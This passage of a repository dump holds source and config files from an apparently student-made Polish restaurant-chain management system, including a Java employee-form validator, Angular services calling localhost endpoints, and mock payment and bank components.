EmployeeForm {\r\n \r\n private static final Logger log = LoggerFactory.getLogger(EmployeeForm.class);\r\n \r\n private boolean valid;\r\n\r\n public boolean isValid() {\r\n return valid;\r\n }\r\n\r\n private String id_restauracji;\r\n private String imie;\r\n private String nazwisko;\r\n private String telefon;\r\n private String stanowisko;\r\n private String id_pracownika;\r\n private String haslo;\r\n\r\n public String getId_restauracji() {\r\n return id_restauracji;\r\n }\r\n\r\n public String getImie() {\r\n return imie;\r\n }\r\n\r\n public String getNazwisko() {\r\n return nazwisko;\r\n }\r\n\r\n public String getTelefon() {\r\n return telefon;\r\n }\r\n\r\n public String getStanowisko() {\r\n return stanowisko;\r\n }\r\n\r\n public String getId_pracownika() {\r\n return id_pracownika;\r\n }\r\n\r\n public String getHaslo() {\r\n return haslo;\r\n }\r\n\r\n public void validate(){\r\n \r\n if(!validateName()){\r\n valid = false;\r\n return;\r\n }\r\n if(!validateLastName()){\r\n valid = false;\r\n return;\r\n }\r\n if(!validateTelephone()){\r\n valid = false;\r\n return;\r\n }\r\n if(!validateId_pracownika()){\r\n valid = false;\r\n return;\r\n }\r\n valid = true;\r\n }\r\n \r\n private boolean validateName(){\r\n if(imie.length() > 20){\r\n log.info(\"String {} has more than 20 signs\", imie);\r\n return false; \r\n }\r\n if(!imie.chars().allMatch(Character::isLetter)){\r\n log.info(\"Some signs of {} are not letters\", imie);\r\n return false; \r\n }\r\n if(!Character.isUpperCase(imie.codePointAt(0))){\r\n log.info(\"First letter of {} is not capitalized\", imie);\r\n return false; \r\n }\r\n \r\n if(!imie.substring(1).chars().allMatch(Character::isLowerCase)){\r\n log.info(\"Letters after first one of {} are capitalized\", imie);\r\n return false; \r\n }\r\n return true;\r\n }\r\n \r\n private boolean validateLastName(){\r\n if(nazwisko.length() > 30){\r\n log.info(\"String {} has more than 30 signs\", nazwisko);\r\n return false; \r\n }\r\n if(!nazwisko.chars().allMatch(Character::isLetter)){\r\n log.info(\"Some signs of {} are not letters\", nazwisko);\r\n return false; \r\n }\r\n return true;\r\n }\r\n \r\n private boolean validateTelephone(){\r\n if(!telefon.matches(\"[\\\\d+ ]+\")){\r\n log.info(\"Telephone number {} has illegal signs\", telefon);\r\n return false; \r\n }\r\n String tmpPhone = telefon;\r\n tmpPhone = tmpPhone.replaceAll(\" \", \"\");\r\n if(tmpPhone.codePointAt(0) == '+' && tmpPhone.length() != 12){\r\n log.info(\"Telephone number with plus sign, {}, does not have 9 signs\", telefon);\r\n return false; \r\n }\r\n Integer amountOfNumbers = tmpPhone.replaceAll(\"\\\\D\", \"\").length();\r\n if(amountOfNumbers != 9 && amountOfNumbers != 11 && amountOfNumbers != 13){\r\n log.info(\"Telephone number , {}, has a different size than 9, 11 or 13\", telefon);\r\n return false; \r\n }\r\n return true;\r\n }\r\n \r\n private boolean validateId_pracownika(){\r\n if(id_pracownika.length() > 20){\r\n log.info(\"String {} has more than 20 signs\", id_pracownika);\r\n return false; \r\n }\r\n if(id_pracownika.length() < 5){\r\n log.info(\"String {} has less than 5 signs\", id_pracownika);\r\n return false; \r\n }\r\n if(!id_pracownika.matches(\"[\\\\p{Graph}]+\")){\r\n log.info(\"Some signs of {} are not letters\", id_pracownika);\r\n return false; \r\n }\r\n return true;\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6359060406684875, "alphanum_fraction": 0.649328887462616, "avg_line_length": 30.216217041015625, "blob_id": "2fc0934a04297b3f26541d93a8f1a1342e2b936a", "content_id": "8059c3bd88a082b1075c45e6ce49dc007cd88f73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1192, "license_type": "no_license", "max_line_length": 88, "num_lines": 37, "path": "/ui-menadzera-sieci/src/app/services/data.service.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Injectable } from '@angular/core';\r\nimport { RequestOptions, Response } from '@angular/http';\r\nimport { HttpClient, HttpHeaders } from '@angular/common/http';\r\nimport { Employee } from '../models/Employee';\r\nimport { Restaurant } from '../models/Restaurant';\r\nimport { Recruitment } from '../models/Recruitment';\r\nimport { Observable } from 'rxjs';\r\nimport 'rxjs/Rx';\r\n\r\n@Injectable()\r\nexport class DataService {\r\n\r\n private readonly httpOptions = {\r\n headers: new HttpHeaders({ \"Content-Type\": \"application/json\" })\r\n };\r\n constructor(\r\n public http: HttpClient\r\n ) { }\r\n\r\n addEmployee(employee: Employee) {\r\n return this.http.post('http://localhost:9090/dodaj_pracownika', employee)\r\n }\r\n\r\n addRecruitment(recruitmentNew: Recruitment) {\r\n return this.http.post('http://localhost:9090/dodaj_ogloszenie', recruitmentNew);\r\n }\r\n\r\n getRecruitmentsList() {\r\n return this.http.get('http://localhost:9090/pobierz_ogloszenia')\r\n .map(res => res as Recruitment);\r\n }\r\n\r\n addRestaurant(restaurant: Restaurant) {\r\n return this.http.post('http://localhost:9094/dodaj_restauracje', restaurant);\r\n }\r\n\r\n}\r\n" }, { "alpha_fraction": 0.71875, "alphanum_fraction": 0.71875, "avg_line_length": 30, "blob_id": "82c2494673c9b19f8180aabeeb6209dde63194d4", "content_id": "dddb5d7dda66fdb7d337c2aa839bd0ad5dd21767", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 32, "license_type": "no_license", "max_line_length": 30, "num_lines": 1, "path": "/bank_back/settings.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "rootProject.name = 'bank_back'\r\n" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7222222089767456, "avg_line_length": 22.33333396911621, "blob_id": "f7cf11336be04a81be2d585e474f55d969761e81", "content_id": "53997222c4e28cac64a8872c7417f11ff4c547e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 144, "license_type": "no_license", "max_line_length": 32, "num_lines": 6, "path": "/ui-menadzera-restauracji/src/app/models/Recruitment.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "export class Recruitment {\r\n public stanowisko: string;\r\n public id_restauracji: number;\r\n public etat: number;\r\n public telefon: number;\r\n}" }, { "alpha_fraction": 0.6218487620353699, "alphanum_fraction": 0.6218487620353699, "avg_line_length": 22.5, "blob_id": "065cfe9ce5646a281ac4fac10f5f4ce44e224679", "content_id": "e95c103e75c00a73fff95f77b43b7043bd046856", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 833, "license_type": "no_license", "max_line_length": 58, "num_lines": 34, "path": "/ui-menadzera-restauracji/src/app/components/add-employee/add-employee.component.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Component, OnInit } from '@angular/core';\r\nimport { Employee } from '../../models/Employee';\r\nimport { DataService } from '../../services/data.service';\r\n\r\n@Component({\r\n selector: 'app-add-employee',\r\n templateUrl: './add-employee.component.html',\r\n styleUrls: ['./add-employee.component.css']\r\n})\r\nexport class AddEmployeeComponent implements OnInit {\r\n\r\n employee: Employee = new Employee();\r\n alertString: string = \"\";\r\n\r\n constructor(\r\n public dataService: DataService\r\n ) { }\r\n\r\n ngOnInit() {\r\n\r\n }\r\n\r\n onSubmit() {\r\n this.dataService.addEmployee(this.employee)\r\n .subscribe(res => {\r\n console.log(res);\r\n var getValueArray = Object.values(res)\r\n this.alertString += getValueArray;\r\n alert(this.alertString.split(',').join(\"\"));\r\n this.alertString = \"\";\r\n });\r\n }\r\n\r\n}\r\n" }, { "alpha_fraction": 0.796407163143158, "alphanum_fraction": 0.8682634830474854, "avg_line_length": 46, "blob_id": "de97369f7abe0602c63c39f9ce18dc4ad8feff46", "content_id": "4cdba58eb9c02dd740082c418f0ab2337b71b2c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 334, "license_type": "no_license", "max_line_length": 64, "num_lines": 7, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/src/main/resources/application.properties", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "server.port=9090\r\n\r\ncreateEmployeeAddress=http://localhost:9091/dodajPracownika\r\ngetEmployeesAddress=http://localhost:9091/pobierzPracownikow\r\nremoveEmployeesAddress=http://localhost:9091/usunPracownika\r\ncreateEmployeeOfferAddress=http://localhost:9091/dodajOgloszenie\r\ngetEmployeeOffersAddress=http://localhost:9091/pobierzOgloszenia" }, { "alpha_fraction": 0.733668327331543, "alphanum_fraction": 0.8140703439712524, "avg_line_length": 37.79999923706055, "blob_id": "b76eedf19a72efd76412126d563989df9cdfec92", "content_id": "9bd87ec68136b677d4254809c1f421eb58ea0fe4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 199, "license_type": "no_license", "max_line_length": 67, "num_lines": 5, "path": "/bank_back/src/main/resources/application.properties", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "server.port=9093\r\n\r\nmockPaymentAddressSuccess = http://localhost:9092/potwierdz_zaplate\r\nmockPaymentAddressFailure = http://localhost:9092/anuluj_zaplate\r\nmockPaymentAddress = http://localhost:4042\r\n" }, { "alpha_fraction": 0.6649305820465088, "alphanum_fraction": 0.6649305820465088, "avg_line_length": 25.5238094329834, "blob_id": "22bc04a6455a0fbd3942cc6f3e1c61bc160f45a8", "content_id": "1f0c80f0c5dd6f3c03af9fde46fa62a526812d6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 576, "license_type": "no_license", "max_line_length": 69, "num_lines": 21, "path": "/recruitment-simulation/src/app/app.component.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Component } from '@angular/core';\r\nimport { DataService } from './services/data.service';\r\nimport { Recruitment } from './models/Recruitment';\r\n\r\n@Component({\r\n selector: 'app-root',\r\n templateUrl: './app.component.html',\r\n styleUrls: ['./app.component.css']\r\n})\r\nexport class AppComponent {\r\n title = 'payment-simulation';\r\n recruitment: any = new Recruitment();\r\n\r\n constructor(public dataService: DataService) { }\r\n ngOnInit() {\r\n this.dataService.getRecruitmentsList().subscribe(recruitment => {\r\n this.recruitment = recruitment;\r\n });\r\n }\r\n\r\n}" }, { "alpha_fraction": 0.6554809808731079, "alphanum_fraction": 0.6644295454025269, "avg_line_length": 25.9375, "blob_id": "76e7ed4a95622b90d143d558e713c9d2d4c94899", "content_id": "d7bb97a7685008d15340f9eb80e184f3301f7311", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 447, "license_type": "no_license", "max_line_length": 73, "num_lines": 16, "path": "/recruitment-simulation/src/app/services/data.service.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Injectable } from '@angular/core';\r\nimport { Headers, RequestOptions, Response } from '@angular/http';\r\nimport { HttpClient } from '@angular/common/http';\r\nimport { Recruitment } from '../models/Recruitment';\r\n\r\n@Injectable()\r\nexport class DataService {\r\n\r\n constructor(public http: HttpClient) { }\r\n\r\n id:string; \r\n\r\n getRecruitmentsList() {\r\n return this.http.get('http://localhost:9090/pobierz_ogloszenia');\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6438791751861572, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 21.370370864868164, "blob_id": "02e1867f6dd5e6fb72daa72e2c44868521727291", "content_id": "8b8bfd73c2feddbf1a5eca68536a792c9a824a6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 630, "license_type": "no_license", "max_line_length": 54, "num_lines": 27, "path": "/payment-simulation/src/app/app.component.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Component } from '@angular/core';\r\nimport { DataService } from './services/data.service';\r\n\r\n@Component({\r\n selector: 'app-root',\r\n templateUrl: './app.component.html',\r\n styleUrls: ['./app.component.css']\r\n})\r\nexport class AppComponent {\r\n title = 'payment-simulation';\r\n status1: string = \"Porażka\";\r\n status2: string = \"Sukcess\";\r\n\r\n constructor(public dataService: DataService) { }\r\n ngOnInit() { }\r\n\r\n onSubmit() {\r\n this.radioChangeHandler(event);\r\n console.log(status);\r\n this.dataService.sendStatus(status);\r\n }\r\n\r\n radioChangeHandler(event: any) {\r\n status = event.target.value;\r\n }\r\n\r\n}" }, { "alpha_fraction": 0.7076336145401001, "alphanum_fraction": 0.709160327911377, "avg_line_length": 32.47368240356445, "blob_id": "3f5f14aa31d319c51b646a9b4e9430cdd33f58ce", "content_id": "65fb8b6e3e6f9833c213b2428e9020be2856bbb2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1310, "license_type": "no_license", "max_line_length": 135, "num_lines": 38, "path": "/baza_zarzadzanie_siecia/src/main/java/baza_zarzadzanie_siecia/Entity/MockConnector.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\npackage baza_zarzadzanie_siecia.Entity;\r\n\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\n\r\n/**\r\n *\r\n * @author adas\r\n */\r\npublic class MockConnector implements Connector{\r\n \r\n private static final Logger log = LoggerFactory.getLogger(MockConnector.class);\r\n\r\n @Override\r\n public String createRestaurant(final String employeeFormJson, final String url) {\r\n return \"You are perfect!\"; \r\n }\r\n\r\n @Override\r\n public String getRestaurant(String property) {\r\n throw new UnsupportedOperationException(\"Not supported yet.\"); //To change body of generated methods, choose Tools | Templates.\r\n }\r\n\r\n @Override\r\n public String assignManager(String assignManagerForm, String property) {\r\n throw new UnsupportedOperationException(\"Not supported yet.\"); //To change body of generated methods, choose Tools | Templates.\r\n }\r\n\r\n @Override\r\n public String removeRestaurant(String restaurantIdForm, String property) {\r\n throw new UnsupportedOperationException(\"Not supported yet.\"); //To change body of generated methods, choose Tools | Templates.\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5797101259231567, "alphanum_fraction": 0.591567873954773, "avg_line_length": 32.5, "blob_id": "1be9c81ab66bd6f896c93a130f9cca01e64c2dfd", "content_id": "7df39413c2eef0e671ac18795c13fd3b0df85c23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 763, "license_type": "no_license", "max_line_length": 115, "num_lines": 22, "path": "/payment-simulation/src/app/services/data.service.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Injectable } from '@angular/core';\r\nimport { Headers, RequestOptions, Response } from '@angular/http';\r\nimport { HttpClient } from '@angular/common/http';\r\n\r\n@Injectable()\r\nexport class DataService {\r\n\r\n constructor(public http: HttpClient) { }\r\n\r\n id:string; \r\n\r\n sendStatus(status) {\r\n this.id = window.location.href.split(\"/\")[3];\r\n if (status === \"Porażka\") {\r\n console.log('wysłana Porażka');\r\n return this.http.get(`http://localhost:9093/failure?id=${this.id}`).subscribe(res => console.log(res));\r\n } else {\r\n console.log('wysłany Sukces');\r\n return this.http.get(`http://localhost:9093/success?id=${this.id}`).subscribe(res => console.log(res));\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6348484754562378, "alphanum_fraction": 0.6378787755966187, "avg_line_length": 23.384614944458008, "blob_id": "09673cc6294a86b36af6e8e12402b082d3da77f4", "content_id": "e422a4f984aaa5c8ff1fe47e93bd78820dfbc245", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 660, "license_type": "no_license", "max_line_length": 84, "num_lines": 26, "path": "/platnosci/platnosci/src/main/java/platnosci/Entity/PrzelewPayment.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package platnosci.Entity;\r\n\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\n\r\npublic class PrzelewPayment extends PaymentAbstract{\r\n \r\n private static final Logger log = LoggerFactory.getLogger(PrzelewPayment.class);\r\n \r\n public PrzelewPayment(final String url){\r\n super(url);\r\n }\r\n\r\n @Override\r\n public String pay(PaymentForm paymentForm) {\r\n if(paymentForm.isValid()){\r\n return getPaymentRedirect(paymentForm);\r\n }else{\r\n return \"Invalid input\";\r\n }\r\n } \r\n \r\n private String getPaymentRedirect(PaymentForm paymentForm){\r\n return \"Not implemented\";\r\n }\r\n}\r\n" } ]
46
ysywh/match
https://github.com/ysywh/match
c421be8cba4e03bd20d6a5d5711164a76148db5a
33f53faf56f546fdc00c10eee25e3af33cbf62f7
fcbe6ebdd618337ba0a6616c83b4b1ca488f9af4
refs/heads/master
2021-01-10T01:09:14.508254
2015-06-01T04:09:45
2015-06-01T04:09:45
36,636,920
5
3
null
null
null
null
null
[ { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.699999988079071, "avg_line_length": 9, "blob_id": "136c6d9a3b8c913ac1643d8abd061952fed7c88a", "content_id": "f797aed7cbda5a3327ac8eda10a0c8a0e615b207", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 20, "license_type": "no_license", "max_line_length": 11, "num_lines": 2, "path": "/README.md", "repo_name": "ysywh/match", "src_encoding": "UTF-8", "text": "# match\nmatch code.\n" }, { "alpha_fraction": 0.4669073522090912, "alphanum_fraction": 0.5728038549423218, "avg_line_length": 29.77777862548828, "blob_id": "22ec7a092fd4a470d04eeaefcb10b2dad209535a", "content_id": "f1b927b19ed0aad72220de53f9173016a489d4b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 831, "license_type": "no_license", "max_line_length": 114, "num_lines": 27, "path": "/访问限制/topo3.py", "repo_name": "ysywh/match", "src_encoding": "UTF-8", "text": "from mininet.topo import Topo\nclass MyTopo(Topo):\n\tdef __init__(self):\n\t Topo.__init__(self)\n\t c=[]\n\t a=[]\n\t s=[]\n\t \n\t s.append(self.addSwitch('s1'))\n\t s.append(self.addSwitch('s2'))\n\t s.append(self.addSwitch('s3'))\n\t \n\t self.addLink(s[0],s[1],3,1)\n\t self.addLink(s[1],s[2],3,1)\n\t h1=self.addHost('h1',mac='00:00:00:00:00:01')\n\t h2=self.addHost('h2',mac='00:00:00:00:00:02')\n\t h3=self.addHost('h3',mac='00:00:00:00:00:03')\n\t h4=self.addHost('h4',mac='00:00:00:00:00:04')\n\t \n self.addLink(s[0],h1,1,1)\n\t self.addLink(s[0],h2,2,1)\n\t self.addLink(s[1],h3,2,1)\n\t self.addLink(s[2],h4,2,1)\n\t #self.addLink(e[1],h3)\ntopos={'mytopo':(lambda:MyTopo())}\n\n# mn --mac --custom /home/hl/text/topo3.py --topo mytopo --switch ovsk,protocols=OpenFlow13 --controller remote -x\n" }, { "alpha_fraction": 0.5805884003639221, "alphanum_fraction": 0.5892632603645325, "avg_line_length": 39.581634521484375, "blob_id": "1f79574ce99c944f020d606c2ef51530974b9a63", "content_id": "1cd83caeb2081ba4385d4c74f4861dcf8f5ad542", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7954, "license_type": "no_license", "max_line_length": 127, "num_lines": 196, "path": "/设计题/badWeb_Protection.py", "repo_name": "ysywh/match", "src_encoding": "UTF-8", "text": "# Copyright (C) 2011 Nippon Telegraph and Telephone Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_3\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom ryu.lib.packet import ipv4\nfrom ryu.lib.packet import tcp\nfrom ryu.lib.packet import udp\nfrom ryu.ofproto import inet\nfrom ryu.ofproto import ether\n\nfrom ryu import utils\nimport binascii\nfrom dnslib.dns import DNSRecord\nimport MySQLdb\n\n#WEB_lacklist = [\"www.taobao.com\", \"www.icbc.com.cn\"]\n\n\nclass SimpleSwitch13(app_manager.RyuApp):\n OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]\n\n def __init__(self, *args, **kwargs):\n super(SimpleSwitch13, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n\n @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\n def switch_features_handler(self, ev):\n datapath = ev.msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n # add goto table 1 flow entry on table 0\n match = parser.OFPMatch()\n inst = [parser.OFPInstructionGotoTable(table_id=1)]\n self.add_flow(datapath, 0, match, table_id=0, inst=inst)\n # install table-miss flow entry on table 1\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,\n ofproto.OFPCML_NO_BUFFER)]\n self.add_flow(datapath, 0, match, actions, table_id=1)\n # install udp_dst_port 50 flow entry on table 0 to match DNS request\n # packet.\n match = parser.OFPMatch(\n eth_type=ether.ETH_TYPE_IP, ip_proto=inet.IPPROTO_UDP, udp_dst=53)\n self.add_flow(datapath, 10, match, actions, table_id=0)\n\n def add_flow(self, datapath, priority, match, actions=[], table_id=0,\n idle_timeout=0, hard_timeout=0, buffer_id=None, inst=None):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n if not inst:\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n if buffer_id:\n mod = parser.OFPFlowMod(datapath=datapath, table_id=table_id, idle_timeout=idle_timeout, hard_timeout=hard_timeout,\n buffer_id=buffer_id, priority=priority, match=match, instructions=inst)\n else:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority, table_id=table_id, idle_timeout=idle_timeout,\n hard_timeout=hard_timeout, match=match, instructions=inst)\n datapath.send_msg(mod)\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n # If you hit this you might want to increase\n # the \"miss_send_length\" of your switch\n if ev.msg.msg_len < ev.msg.total_len:\n self.logger.debug(\"packet truncated: only %s of %s bytes\",\n ev.msg.msg_len, ev.msg.total_len)\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocols(ethernet.ethernet)[0]\n\n # judge \"DNS packet\"\n pkt_ipv4 = pkt.get_protocol(ipv4.ipv4)\n if pkt_ipv4:\n if(pkt_ipv4.proto == inet.IPPROTO_UDP):\n pkt_udp = pkt.get_protocol(udp.udp)\n if 53 == pkt_udp.dst_port:\n print \" DNS request:dst_prot\", pkt_udp.dst_port\n self._badWeb_Potect(datapath, msg)\n else:\n self._forwarding(datapath, msg)\n\n # bad web judge and protection\n def _badWeb_Potect(self, datapath, msg):\n print \"in _badWeb_Potect\"\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n pkt = packet.Packet(msg.data)\n hdata = utils.hex_array(msg.data)\n hdata = hdata.split(' ')\n hex_data = ''\n for hexdata in hdata:\n cc = hexdata.replace('0x', '')\n if len(cc) == 1:\n cc = '0%s' % cc\n hex_data = hex_data + cc\n # print \"hex_data\", hex_data\n # print 'pkt:', pkt\n\n hex_dnsdata = hex_data[84:]\n # print \"dns hex data\", hex_dnsdata\n dns_binary = binascii.unhexlify(hex_dnsdata)\n dns = DNSRecord.parse(dns_binary)\n # print 'dns:', dns\n dns\n web_name = dns.questions[0].get_qname().label\n web_name = \".\".join(list(web_name))\n # print web_name\n\n try:\n conn = MySQLdb.connect(\n host='localhost', user='root', passwd='123456', db='web', port=3306)\n cur = conn.cursor()\n select = 'select * from WEB_lacklist where name=\"%s\"' % web_name\n if(cur.execute(select)):\n print ' ilegal web \"%s\", it`s dangerous! you can`t to access it.' % web_name\n cur.close()\n conn.close()\n return\n else:\n print 'legal web \"%s\",you can access it.' % web_name\n cur.close()\n conn.close()\n self._forwarding(datapath, msg)\n except MySQLdb.Error, e:\n print \"Mysql Error %d: %s\" % (e.args[0], e.args[1])\n\n # for web in WEB_lacklist:\n # if web_name == web:\n # print \"ilegal web, you can`t to access.\"\n # return\n # else:\n # self._forwarding(datapath, msg)\n\n def _forwarding(self, datapath, msg):\n print \"in _forwarding...\"\n datapath = msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n in_port = msg.match['in_port']\n\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocols(ethernet.ethernet)[0]\n dst = eth.dst\n src = eth.src\n dpid = datapath.id\n self.mac_to_port.setdefault(dpid, {})\n # learn a mac address to avoid FLOOD next time.\n self.mac_to_port[dpid][src] = in_port\n\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n\n actions = [parser.OFPActionOutput(out_port)]\n # install a flow to avoid packet_in next time\n if out_port != ofproto.OFPP_FLOOD:\n match = parser.OFPMatch(in_port=in_port, eth_dst=dst)\n # verify if we have a valid buffer_id, if yes avoid to send both\n # flow_mod & packet_out\n if msg.buffer_id != ofproto.OFP_NO_BUFFER:\n self.add_flow(datapath, 1, match, actions,\n idle_timeout=10, hard_timeout=10, table_id=1, buffer_id=msg.buffer_id)\n else:\n self.add_flow(datapath, 1, match, actions, idle_timeout=10, table_id=1,\n hard_timeout=10)\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n if (out_port == ofproto.OFPP_FLOOD) or (msg.buffer_id == ofproto.OFP_NO_BUFFER):\n out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,\n in_port=in_port, actions=actions, data=data)\n datapath.send_msg(out)\n" }, { "alpha_fraction": 0.5753828883171082, "alphanum_fraction": 0.5865119099617004, "avg_line_length": 44.12017059326172, "blob_id": "20bc2d224f4d89f6196a1cf69c6573d5a1b18d94", "content_id": "2706e93bd52550678eb238373539f588c61f16c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10513, "license_type": "no_license", "max_line_length": 127, "num_lines": 233, "path": "/访问限制/proxy_access.py", "repo_name": "ysywh/match", "src_encoding": "UTF-8", "text": "# Copyright (C) 2011 Nippon Telegraph and Telephone Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_3\nfrom ryu.ofproto import ofproto_v1_3_parser\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom ryu.lib.packet import arp\nfrom ryu.lib.packet import ipv4\nfrom ryu.ofproto import inet\nfrom ryu.ofproto import ether\n\nfrom ryu.lib import hub\n\ndetect_ip = '10.0.0.99'\ndetect_mac = '00:00:00:00:00:99'\nhost_proxy = '10.0.0.1'\nweb_server = '10.0.0.3'\nweb_proxy = '10.0.0.4'\n\n\nclass ProxyAccess(app_manager.RyuApp):\n OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]\n\n def __init__(self, *args, **kwargs):\n super(ProxyAccess, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n self.ip_to_mac = {}\n self.dps = []\n self.web_server_dp = None\n hub.spawn(self._redirect)\n\n @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\n def switch_features_handler(self, ev):\n datapath = ev.msg.datapath\n print \"successfully connect switch(dpid:%d)\" % (datapath.id)\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n self.dps.append(datapath)\n # add goto table 1 flow entry on table 0\n match = parser.OFPMatch()\n inst = [parser.OFPInstructionGotoTable(table_id=1)]\n self.add_flow(datapath, 0, match, table_id=0, inst=inst)\n # install table-miss flow entry on table 1\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,\n ofproto.OFPCML_NO_BUFFER)]\n self.add_flow(datapath, 0, match, actions, table_id=1)\n\n def add_flow(self, datapath, priority, match, actions=[], table_id=0,\n idle_timeout=0, hard_timeout=0, buffer_id=None, inst=None):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n if not inst:\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n if buffer_id:\n mod = parser.OFPFlowMod(datapath=datapath, table_id=table_id, idle_timeout=idle_timeout, hard_timeout=hard_timeout,\n buffer_id=buffer_id, priority=priority, match=match, instructions=inst)\n else:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority, table_id=table_id, idle_timeout=idle_timeout,\n hard_timeout=hard_timeout, match=match, instructions=inst)\n datapath.send_msg(mod)\n\n # install redirect flows\n def _redirect(self):\n hub.sleep(3)\n self.ip_to_mac.setdefault(host_proxy)\n self.ip_to_mac.setdefault(web_server)\n 